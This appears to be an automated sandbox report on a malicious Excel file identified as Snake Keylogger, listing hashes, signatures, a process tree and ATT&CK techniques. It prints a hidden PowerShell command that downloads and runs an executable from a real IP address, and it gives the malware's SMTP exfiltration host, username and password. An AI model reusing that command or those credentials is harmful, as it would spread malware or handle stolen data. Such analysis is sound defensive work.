Overview

overview

10

Static

static

8

IMG_50_78_63.xls

windows7_x64

10

IMG_50_78_63.xls

windows10_x64

1

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    14-04-2021 20:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IMG_50_78_63.xls

  • Size

    167KB

  • MD5

    4c9d3db50cd58ec12305d904d2354f00

  • SHA1

    b0a4028da497f94c3d00f0c44a60b40fc369d5bc

  • SHA256

    fa0e9c96ef83963d0ab05d58302b13ac57356aed411562c71ef1812066e8ac97

  • SHA512

    744fa49552e1cca5a0dc71da06d55f61a4f3380b61974e9306cfc79e91909169261b96e6ee3cc844df2e5e3354771e0468259f3522e21950e35397f0f9fb1a1e

Score
10/10
snakekeyloggerkeyloggerstealer

Malware Config

Extracted

Family

snakekeylogger

Credentials

  • Protocol:     smtp
  • Host:
    nobettwo.xyz
  • Port:
    587
  • Username:
    folks@nobettwo.xyz
  • Password:
    [FY$nv_Hp[H7

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Snake Keylogger Payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IMG_50_78_63.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1652
  • C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
    1⤵
    • Drops file in System32 directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1728
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -w Hidden Invoke-WebRequest -Uri "http://178.17.171.144/sch/Kqslz.exe" -OutFile "C:\Users\Public\Documents\seesituation.exe";C:\Users\Public\Documents\seesituation.exe
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:544
      • C:\Users\Public\Documents\seesituation.exe
        "C:\Users\Public\Documents\seesituation.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1912
        • C:\Users\Admin\AppData\Local\Temp\seesituation.exe
          C:\Users\Admin\AppData\Local\Temp\seesituation.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2028

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\seesituation.exe
    MD5

    a8520120160bf0ed2d5f1a62ccd0a2a6

    SHA1

    ddf74b46aee71d32e31e66aad8b3599a5512eea5

    SHA256

    a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33

    SHA512

    c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\seesituation.exe
    MD5

    a8520120160bf0ed2d5f1a62ccd0a2a6

    SHA1

    ddf74b46aee71d32e31e66aad8b3599a5512eea5

    SHA256

    a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33

    SHA512

    c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9

    Download Submit
  • C:\Users\Public\Documents\seesituation.exe
    MD5

    a8520120160bf0ed2d5f1a62ccd0a2a6

    SHA1

    ddf74b46aee71d32e31e66aad8b3599a5512eea5

    SHA256

    a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33

    SHA512

    c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9

    Download Submit
  • C:\Users\Public\Documents\seesituation.exe
    MD5

    a8520120160bf0ed2d5f1a62ccd0a2a6

    SHA1

    ddf74b46aee71d32e31e66aad8b3599a5512eea5

    SHA256

    a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33

    SHA512

    c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9

    Download Submit
  • \Users\Admin\AppData\Local\Temp\seesituation.exe
    MD5

    a8520120160bf0ed2d5f1a62ccd0a2a6

    SHA1

    ddf74b46aee71d32e31e66aad8b3599a5512eea5

    SHA256

    a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33

    SHA512

    c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9

    Download Submit
  • \Users\Public\Documents\seesituation.exe
    MD5

    a8520120160bf0ed2d5f1a62ccd0a2a6

    SHA1

    ddf74b46aee71d32e31e66aad8b3599a5512eea5

    SHA256

    a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33

    SHA512

    c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9

    Download Submit
  • \Users\Public\Documents\seesituation.exe
    MD5

    a8520120160bf0ed2d5f1a62ccd0a2a6

    SHA1

    ddf74b46aee71d32e31e66aad8b3599a5512eea5

    SHA256

    a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33

    SHA512

    c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9

    Download Submit
  • \Users\Public\Documents\seesituation.exe
    MD5

    a8520120160bf0ed2d5f1a62ccd0a2a6

    SHA1

    ddf74b46aee71d32e31e66aad8b3599a5512eea5

    SHA256

    a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33

    SHA512

    c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9

    Download Submit
  • memory/544-80-0x00000000061F0000-0x00000000061F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/544-69-0x0000000001330000-0x0000000001331000-memory.dmp
    Filesize

    4KB

    Download
  • memory/544-72-0x0000000005240000-0x0000000005241000-memory.dmp
    Filesize

    4KB

    Download
  • memory/544-75-0x00000000057E0000-0x00000000057E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/544-70-0x0000000001332000-0x0000000001333000-memory.dmp
    Filesize

    4KB

    Download
  • memory/544-81-0x0000000006470000-0x0000000006471000-memory.dmp
    Filesize

    4KB

    Download
  • memory/544-88-0x0000000006390000-0x0000000006391000-memory.dmp
    Filesize

    4KB

    Download
  • memory/544-89-0x0000000006500000-0x0000000006501000-memory.dmp
    Filesize

    4KB

    Download
  • memory/544-90-0x000000007EF20000-0x000000007EF21000-memory.dmp
    Filesize

    4KB

    Download
  • memory/544-71-0x00000000012D0000-0x00000000012D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/544-65-0x0000000000000000-mapping.dmp
    Download
  • memory/544-68-0x0000000004820000-0x0000000004821000-memory.dmp
    Filesize

    4KB

    Download
  • memory/544-67-0x0000000000D90000-0x0000000000D91000-memory.dmp
    Filesize

    4KB

    Download
  • memory/544-66-0x00000000754F1000-0x00000000754F3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1652-60-0x000000002F951000-0x000000002F954000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1652-111-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1652-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1652-61-0x0000000070F81000-0x0000000070F83000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1912-93-0x0000000000000000-mapping.dmp
    Download
  • memory/1912-102-0x0000000000720000-0x000000000075D000-memory.dmp
    Filesize

    244KB

    Download
  • memory/1912-101-0x0000000004BA5000-0x0000000004BB6000-memory.dmp
    Filesize

    68KB

    Download
  • memory/1912-100-0x0000000000470000-0x0000000000472000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1912-99-0x0000000004BA0000-0x0000000004BA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1912-97-0x0000000001000000-0x0000000001001000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2028-104-0x0000000000400000-0x000000000046A000-memory.dmp
    Filesize

    424KB

    Download
  • memory/2028-105-0x000000000046479E-mapping.dmp
    Download
  • memory/2028-108-0x0000000000400000-0x000000000046A000-memory.dmp
    Filesize

    424KB

    Download
  • memory/2028-110-0x0000000004AE0000-0x0000000004AE1000-memory.dmp
    Filesize

    4KB

    Download